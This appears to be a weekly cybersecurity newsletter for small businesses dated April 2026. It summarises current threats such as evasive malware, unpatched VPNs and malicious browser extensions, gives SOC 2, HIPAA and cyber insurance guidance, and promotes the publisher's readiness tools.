This Week's Cyber Pulse — April 21, 2026

Your weekly intelligence brief for small and mid-size businesses. Sourced, rated, and written in plain English.

Threat Roundup

🔴 HIGH SEVERITY: EDR-Evasion Malware Targeting SMBs Without Endpoint Protection

A new strain of commodity malware specifically designed to evade legacy antivirus (AV) tools is spreading via malicious email attachments. Named "SilverSlip" by threat intelligence firms, it uses living-off-the-land (LOTL) techniques — abusing legitimate Windows tools like PowerShell and WMI — to establish persistence without dropping traditional malicious executables.

Traditional AV solutions (Windows Defender in basic mode, older Symantec/McAfee deployments) are not catching this variant reliably. Endpoint Detection and Response (EDR) solutions with behavioral analysis are detecting and blocking it.

Why this matters now: This is the exact threat pattern driving cyber insurers to require EDR. If you're using legacy AV only, you're exposed and likely uninsurable at standard rates.

What to do:

• Evaluate EDR solutions: CrowdStrike Falcon Go (SMB-tier), SentinelOne, or Microsoft Defender for Business (included in Microsoft 365 Business Premium)


• Microsoft Defender for Business costs ~$3/user/month and is significantly better than free Windows Defender


• Prioritize EDR on endpoints with internet-facing access and financial system access

Severity: High | Affected: SMBs running legacy AV | Source: Sophos X-Ops, Secureworks CTU Research

🟡 MEDIUM SEVERITY: VPN Vulnerabilities Still Unpatched at Thousands of SMBs

Ivanti Connect Secure and Palo Alto Networks GlobalProtect VPN vulnerabilities disclosed in early 2026 remain unpatched at a significant percentage of SMB deployments. CISA has added both to its Known Exploited Vulnerabilities (KEV) catalog, meaning these are actively being used in attacks.

What to do:

• If you use either product, check for the latest patches immediately


• If you're unsure what VPN software you use, contact your IT provider today


• Consider replacing legacy hardware VPN with zero-trust network access (ZTNA) solutions for better security and lower maintenance overhead

Severity: Medium-High | Affected: SMBs using Ivanti or Palo Alto VPN | Source: CISA KEV Catalog, April 2026

🟢 LOW SEVERITY: Browser Extension Credential Theft Campaign

A campaign targeting Chrome and Edge browser extensions is stealing saved credentials from business browsers. The attack distributes malicious extensions via compromised developer accounts in the Chrome Web Store.

What to do:

• Audit browser extensions across company devices (Chrome: chrome://extensions)


• Remove extensions not actively needed


• Remind employees to use a dedicated password manager (Bitwarden, 1Password) rather than browser-saved passwords

Severity: Low-Medium | Affected: All businesses | Source: Extension Total, SANS Internet Storm Center

Compliance Deadline Watch

SOC 2 Evidence Collection — What to Capture Monthly

SOC 2 Type II audits cover a 6-12 month observation period. Companies preparing for SOC 2 now should be actively collecting evidence every month, not scrambling at audit time.

What to collect monthly:

• User access reviews (who has access to what systems — screenshot or export)


• Security patching records (what patches were applied, when)


• Vulnerability scan results (even free tools like OpenVAS or Qualys Community Edition count)


• Incident log entries (even if nothing happened — "no incidents this period" is valid evidence)


• Vendor security review notes (did you review any new vendor's security posture?)

CyberStackHub's SOC 2 Compliance Checker helps you track which controls you have evidence for and which are still gaps.

HIPAA Annual Risk Analysis Reminder

If you're a covered entity or business associate under HIPAA, your annual risk analysis is required — not optional. Many covered entities treat it as a one-time event. HIPAA requires it annually and after any significant change to your environment (new system, new vendor, cloud migration).

Use CyberStackHub's Risk Assessment Tool as a starting point, then document your methodology and findings.

Insurance Market Update

The market is moving fast: EDR is now a hard requirement at Chubb, AIG, and Hartford for any SMB with more than 50 employees or more than $5M in revenue. Carriers are also starting to require backup immutability (backups that cannot be deleted or modified by ransomware) as a condition of coverage.

If your backup solution uses a Windows or Linux agent on the same network as your primary systems, it's likely not immutable. Cloud-native backup solutions (Backblaze Business, Veeam Cloud Connect, Druva) provide immutability by design.

Tool Spotlight: Cyber Insurance Readiness Checker

This week: our Cyber Insurance Readiness Tool — maps your current security controls to what insurers actually require during underwriting. It tells you exactly which gaps are likely to increase your premium or trigger a coverage denial.

Given this week's news about EDR becoming a hard requirement, the readiness checker will flag your endpoint protection status immediately.

→ Check your insurance readiness free

Run The Cyber Pulse Stack — Free

Get a personalized security brief covering threats relevant to your industry, compliance deadlines you're facing, and your insurance readiness score — delivered to your inbox, phone, or as a downloadable PDF.

→ Run The Cyber Pulse Stack free

Frequently Asked Questions

What is EDR and how is it different from antivirus?
Antivirus detects known malware signatures — it matches files against a database of known threats. EDR (Endpoint Detection and Response) monitors behavior in real-time — it detects suspicious actions like unusual PowerShell execution or lateral movement, even from zero-day threats with no known signature. EDR is significantly more effective against modern attacks.

Which EDR solution is best for a small business?
Microsoft Defender for Business (included in Microsoft 365 Business Premium at ~$22/user/month) is the most cost-effective entry point for most SMBs already on Microsoft 365. For more advanced needs, CrowdStrike Falcon Go and SentinelOne offer SMB-tier pricing. The key is behavior-based detection, not just signature-based scanning.

Will my cyber insurance premium go up if I don't have EDR?
Most likely, yes. At insurers requiring EDR, not having it can result in premium increases of 20–40%, reduced coverage limits, or policy denial. The incremental cost of EDR (often $3–10/user/month) is almost always less than the insurance impact of not having it.

What does SOC 2 Type II actually cover?
SOC 2 Type II is an audit of your security controls over a 6-12 month observation period. It covers five Trust Service Criteria: Security (required), plus optional Availability, Confidentiality, Processing Integrity, and Privacy. The Type II (vs. Type I) distinction means auditors verified the controls operated continuously over time, not just existed on paper.

More editions: This Week's Cyber Pulse Archive